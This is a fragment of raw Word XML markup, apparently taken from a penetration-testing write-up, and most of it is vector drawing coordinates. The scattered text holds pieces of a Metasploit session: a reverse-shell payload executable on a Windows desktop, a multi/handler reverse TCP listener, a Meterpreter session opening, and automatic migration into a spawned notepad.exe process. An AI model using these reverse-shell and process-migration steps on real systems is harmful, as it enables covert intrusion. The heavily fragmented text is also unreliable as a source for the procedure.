2296,6973,2299,6973,2302,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6973,2305,6974,2305,6974,2305,6974,2305,6974,2305,6974,2305,6975,2305,6975,2305,6975,2305,6975,2305,6976,2305,6976,2305,6977,2305,6977,2305,6977,2305,6978,2305,6978,2305,6979,2305,6980,2305,6980,2305,6981,2305,6981,2305,6982,2305,6983,2305,6984,2305,6985,2305,6985,2305,6986,2305,6987,2305,6988,2305,6989,2305,6990,2305,6991,2305,6993,2305,6994,2305,6995,2305,6996,2305,6998,2305,6999,2305,7001,2305,7002,2305,7004,2305,7005,2305,7007,2305,7009,2305,7010,2305,7012,2305,7014,2305,7016,2305,7018,2305,7020,2305,7022,2305,7024,2305,7027,2305,7029,2305,7031,2305,7034,2305,7036,2305,7039,2305,7042,2305,7044,2305,7047,2305,7050,2305,7053,2305,7056,2305,7059,2305,7062,2305,7065,2305,7069,2305,7072,2305,7076,2305,7079,2305,7083,2305,7087,2305,7090,2305,7094,2305,7098,2305,7102,2305,7106,2305,7111,2305,7115,2305,7119,2305,7124,2305,7128,2305,7133,2305,7138,2305,7143,2305,7148,2305,7153,2305,7158,2305,7163,2305,7169,2305,7174,2305,7180,2305,7185,2305,7191,2305,7197,2305,7203,2305,7209,2305,7215,2305,7221,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2305,7228,2304,7228,2304,7228,2304,7228,2304,7228,2304,7228,2304,7228,2304,7228,2303,7228,2303,7228,2303,7228,2303,7228,2303,7228,2302,7228,2302,7228,2302,7228,2302,7228,2301,7228,2301,7228,2301,7228,2300,7228,2300,7228,2299,7228,2299,7228,2299,7228,2298,7228,2298,7228,2297,7228,2297,7228,2296,7228,2296,7228,2295,7228,2295,7228,2294,7228,2293,7228,2293,7228,2292,7228,2291,7228,2291,7228,2290,7228,2289,7228,2288,7228,2287,7228,2286,7228,2286,7228,2285,7228,2284,7228,2283,7228,2282,7228,2281,7228,2280,7228,2279,7228,2277,7228,2276,7228,2275,7228,2274,7228,2273,7228,2271,7228,2270,7228,2269,7228,2267,7228,2266,7228,2264,7228,2263,7228,2261,7228,2260,7228,2258,7228,2257,7228,2255,7228,2253,7228,2251,7228,2250,7228,2248,7228,2246,7228,2244,7228,2242,7228,2240,7228,2238,7228,2236,7228,2234,7228,2232,7228,2230,7228,2227,7228,2225,7228,2223,7228,2220,7228,2218,7228,2215,7228,2213,7228,2210,7228,2208,7228,2205,7228,2202,7228,2200,7228,2197,7228,2194,7228,2191,7228,2188,7228,2185,7228,2185,7228,2185,7228,2185,7228,2185,7228,2185,7228,2185,7228,2185,7228,2185,7228,2185,7228,2185,7228,2185,7227,2185,7227,2185,7227,2185,7227,2185,7227,2185,7227,2185,7227,2185,7227,2185,7227,2185,7227,2185,7226,2185,7226,2185,7226,2185,7226,2185,7226,2185,7225,2185,7225,2185,7225,2185,7224,2185,7224,2185,7224,2185,7223,2185,7223,2185,7222,2185,7222,2185,7221,2185,7221,2185,7220,2185,7219,2185,7219,2185,7218,2185,7217,2185,7216,2185,7216,2185,7215,2185,7214,2185,7213,2185,7212,2185,7211,2185,7210,2185,7209,2185,7208,2185,7206,2185,7205,2185,7204,2185,7202,2185,7201,2185,7200,2185,7198,2185,7197,2185,7195,2185,7193,2185,7192,2185,7190,2185,7188,2185,7186,2185,7184,2185,7182,2185,7180,2185,7178,2185,7176,2185,7173,2185,7171,2185,7169,2185,7166,2185,7164,2185,7161,2185,7159,2185,7156,2185,7153,2185,7150,2185,7147,2185,7144,2185,7141,2185,7138,2185,7135,2185,7131,2185,7128,2185,7124,2185,7121,2185,7117,2185,7114,2185,7110,2185,7106,2185,7102,2185,7098,2185,7094,2185,7089,2185,7085,2185,7081,2185,7076,2185,7072,2185,7067,2185,7062,2185,7057,2185,7052,2185,7047,2185,7042,2185,7037,2185,7032,2185,7026,2185,7021,2185,7015,2185,7009,2185,7003,2185,6997,2185,6991,2185,6985,2185,6979,2185,6973e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:108.500pt;margin-top:366.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2170,7330" coordsize="130,270">
        <v:shape style="position:absolute;left:2170;top:7330;width:130;height:270" coordorigin="2170,7330" coordsize="130,270" path="m2185,7348l2185,7348,2185,7348,2185,7348,2185,7348,2185,7348,2185,7348,2185,7348,2185,7348,2185,7348,2185,7348,2185,7348,2185,7348,2185,7348,2185,7348,2185,7348,2185,7348,2185,7348,2185,7348,2186,7348,2186,7348,2186,7348,2186,7348,2186,7348,2186,7348,2186,7348,2186,7348,2186,7348,2187,7348,2187,7348,2187,7348,2187,7348,2187,7348,2187,7348,2188,7348,2188,7348,2188,7348,2188,7348,2189,7348,2189,7348,2189,7348,2190,7348,2190,7348,2190,7348,2191,7348,2191,7348,2192,7348,2192,7348,2192,7348,2193,7348,2193,7348,2194,7348,2195,7348,2195,7348,2196,7348,2196,7348,2197,7348,2198,7348,2198,7348,2199,7348,2200,7348,2200,7348,2201,7348,2202,7348,2203,7348,2204,7348,2205,7348,2206,7348,2207,7348,2208,7348,2209,7348,2210,7348,2211,7348,2212,7348,2213,7348,2214,7348,2215,7348,2216,7348,2218,7348,2219,7348,2220,7348,2222,7348,2223,7348,2224,7348,2226,7348,2227,7348,2229,7348,2230,7348,2232,7348,2234,7348,2235,7348,2237,7348,2239,7348,2241,7348,2242,7348,2244,7348,2246,7348,2248,7348,2250,7348,2252,7348,2254,7348,2256,7348,2259,7348,2261,7348,2263,7348,2265,7348,2268,7348,2270,7348,2272,7348,2275,7348,2277,7348,2280,7348,2283,7348,2285,7348,2288,7348,2291,7348,2293,7348,2296,7348,2299,7348,2302,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7348,2305,7349,2305,7349,2305,7349,2305,7349,2305,7349,2305,7350,2305,7350,2305,7350,2305,7350,2305,7351,2305,7351,2305,7351,2305,7352,2305,7352,2305,7353,2305,7353,2305,7354,2305,7354,2305,7355,2305,7355,2305,7356,2305,7357,2305,7357,2305,7358,2305,7359,2305,7360,2305,7361,2305,7361,2305,7362,2305,7363,2305,7364,2305,7366,2305,7367,2305,7368,2305,7369,2305,7370,2305,7372,2305,7373,2305,7374,2305,7376,2305,7377,2305,7379,2305,7380,2305,7382,2305,7384,2305,7386,2305,7387,2305,7389,2305,7391,2305,7393,2305,7395,2305,7397,2305,7400,2305,7402,2305,7404,2305,7407,2305,7409,2305,7412,2305,7414,2305,7417,2305,7420,2305,7422,2305,7425,2305,7428,2305,7431,2305,7434,2305,7437,2305,7441,2305,7444,2305,7447,2305,7451,2305,7454,2305,7458,2305,7462,2305,7466,2305,7469,2305,7473,2305,7478,2305,7482,2305,7486,2305,7490,2305,7495,2305,7499,2305,7504,2305,7508,2305,7513,2305,7518,2305,7523,2305,7528,2305,7533,2305,7538,2305,7544,2305,7549,2305,7555,2305,7560,2305,7566,2305,7572,2305,7578,2305,7584,2305,7590,2305,7596,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2305,7603,2304,7603,2304,7603,2304,7603,2304,7603,2304,7603,2304,7603,2304,7603,2303,7603,2303,7603,2303,7603,2303,7603,2303,7603,2302,7603,2302,7603,2302,7603,2302,7603,2301,7603,2301,7603,2301,7603,2300,7603,2300,7603,2299,7603,2299,7603,2299,7603,2298,7603,2298,7603,2297,7603,2297,7603,2296,7603,2296,7603,2295,7603,2295,7603,2294,7603,2293,7603,2293,7603,2292,7603,2291,7603,2291,7603,2290,7603,2289,7603,2288,7603,2287,7603,2286,7603,2286,7603,2285,7603,2284,7603,2283,7603,2282,7603,2281,7603,2280,7603,2279,7603,2277,7603,2276,7603,2275,7603,2274,7603,2273,7603,2271,7603,2270,7603,2269,7603,2267,7603,2266,7603,2264,7603,2263,7603,2261,7603,2260,7603,2258,7603,2257,7603,2255,7603,2253,7603,2251,7603,2250,7603,2248,7603,2246,7603,2244,7603,2242,7603,2240,7603,2238,7603,2236,7603,2234,7603,2232,7603,2230,7603,2227,7603,2225,7603,2223,7603,2220,7603,2218,7603,2215,7603,2213,7603,2210,7603,2208,7603,2205,7603,2202,7603,2200,7603,2197,7603,2194,7603,2191,7603,2188,7603,2185,7603,2185,7603,2185,7603,2185,7603,2185,7603,2185,7603,2185,7603,2185,7603,2185,7603,2185,7603,2185,7603,2185,7603,2185,7603,2185,7603,2185,7602,2185,7602,2185,7602,2185,7602,2185,7602,2185,7602,2185,7602,2185,7602,2185,7601,2185,7601,2185,7601,2185,7601,2185,7600,2185,7600,2185,7600,2185,7600,2185,7599,2185,7599,2185,7598,2185,7598,2185,7597,2185,7597,2185,7596,2185,7596,2185,7595,2185,7595,2185,7594,2185,7593,2185,7592,2185,7592,2185,7591,2185,7590,2185,7589,2185,7588,2185,7587,2185,7586,2185,7585,2185,7584,2185,7583,2185,7582,2185,7580,2185,7579,2185,7578,2185,7576,2185,7575,2185,7573,2185,7572,2185,7570,2185,7568,2185,7567,2185,7565,2185,7563,2185,7561,2185,7559,2185,7557,2185,7555,2185,7553,2185,7551,2185,7549,2185,7546,2185,7544,2185,7541,2185,7539,2185,7536,2185,7534,2185,7531,2185,7528,2185,7525,2185,7522,2185,7519,2185,7516,2185,7513,2185,7510,2185,7507,2185,7503,2185,7500,2185,7496,2185,7492,2185,7489,2185,7485,2185,7481,2185,7477,2185,7473,2185,7469,2185,7465,2185,7460,2185,7456,2185,7451,2185,7447,2185,7442,2185,7437,2185,7433,2185,7428,2185,7423,2185,7417,2185,7412,2185,7407,2185,7401,2185,7396,2185,7390,2185,7384,2185,7379,2185,7373,2185,7367,2185,7360,2185,7354,2185,7348e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:420.600pt;width:467.400pt;height:137.40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!C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\Users\John\Desktop\rev_x86_53_exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="24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echo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quit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&amp;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ft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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: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color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>del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Q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59800"/>
          <w:spacing w:val="5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AutoRunScript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migrate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AutoRunScript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migrate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551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msf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multi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exploit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reverse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TCP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handler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Sending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179779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bytes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opened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.3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5530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2019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01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21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05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14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57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4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0500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ID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.4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.3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5530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processing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Auto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RunScript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'migrate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‐f'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="163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Meterpreter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scripts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are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deprecated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Try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post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manage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migrat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e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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Example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post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windows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manage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migrate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value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[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Current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process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rev_x86_53_exe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8832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*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Spawning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notepad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exe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process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migrate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to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22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+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Migrating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8788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0" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/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